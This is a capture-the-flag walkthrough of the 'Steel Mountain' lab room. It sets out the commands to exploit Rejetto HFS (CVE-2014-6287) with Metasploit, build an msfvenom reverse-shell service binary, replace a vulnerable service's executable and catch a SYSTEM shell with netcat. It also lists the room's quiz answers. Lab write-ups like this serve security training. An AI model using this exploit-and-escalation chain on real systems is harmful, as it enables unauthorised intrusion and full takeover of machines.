Steel Mountain Walkthrough

Aditya Jha
4 min readSep 3, 2023

INTRODUCTION:

So this Room called Steel Mountain is based on a series named as Mr. Robot,

The very First question in this Introduction part is:

What is the name of Employee of the month?

If we go to the page and click to download the image then we can see the name there, as we can see in the image below:

Employee Of The Month

INITIAL ACCESS:

Now in this part or in any other machine,

Our First step is to run a nmap scan:

Command: nmap -T5 -p- -A <Target IP>

The we can see in the screenshots below:

Q2.1 Scan the machine with nmap. What is the other port running a web server on?

Ans2.1: 8080

Q2.2 Take a look at the other web server. What file server is running?

Ans2.2: Rejetto HTTP FILE SERVER

We can get this on the port 8080 of this machine:

If we click on this then we will redirected to it’s page.

Now we can check the CVE of HttpFileServer 2.3 on google and we will get the answer.

Q2.3 What is the CVE number to exploit this file server?

Ans2.3: 2014–6287

Now we will use Metasploit to get the initial access.

To open Metasploit then we can use the command: msfconsole

Now we can search for the exploit for HttpFileServer

We found an exploit for this:

We can use this by using,

Command: use 0

Now we will set the RPORT, RHOST, LHOST

Command: set RPORT 8080

set RHOST <Target IP>

set LHOST <Attacker IP>

Now after setting all these:

Run Command: Exploit

Now we will get the shell:

Now we can find the flag inside C:/Users/bill/Desktop

We got the user flag,

Now we have to escalate our Privilege to get the root flag.

PRIVILEGE ESCALATION:

Now we can use a script to Escalate Privilege.

PowerUp.ps1

We can upload this script on the machine using Metasploit using the command: upload <script Path>

Now we will run this script

Firstly the Command will be:

load powershell

powershell_shell

Now we will run the script,

Command: . .\PowerUp.ps1

The Result will look like this:

Here we will get the Answer of Our Questions:

Q3.2: Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

Ans3.2: AdvancedSystemCareService9

Now we will make a malicious application named as ASCService and replace it with the original one to get the reverse shell.

Firstly we have to popup a shell with using the

command: shell

Now we will stop the service with,

Command: sc stop AdvancedSystemCareService9

Now we will create a malicious application in our machine by using msfvenom.

Command: msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

Now we will upload this into our victim machine.

The process will be similar.

Now we will copy this application to the original path of ASCService.

Command: copy “C:\Users\bill\Desktop\ASCService.exe” “C:\Program Files (x86)\IObit\Advanced SystemCare\”

Now we will setup a listener to get the root access.

Commad: nc -nlvp 4443

Now we will start the service to get the root shell.

Command: sc start AdvancedSystemCareService9

After starting the Service,

We finally got the reverse shell through our listener:

Now we can get the root flag inside: C:\Users\Administrator\Desktop

We finally got the root flag as you can see in the above screenshot.

Access and Escalation Without Metasploit:

Q4.2 What powershell -c command could we run to manually find out the service name?

*Format is “powershell -c “command here”*

Ans4.2: powershell -c Get-Service

--

--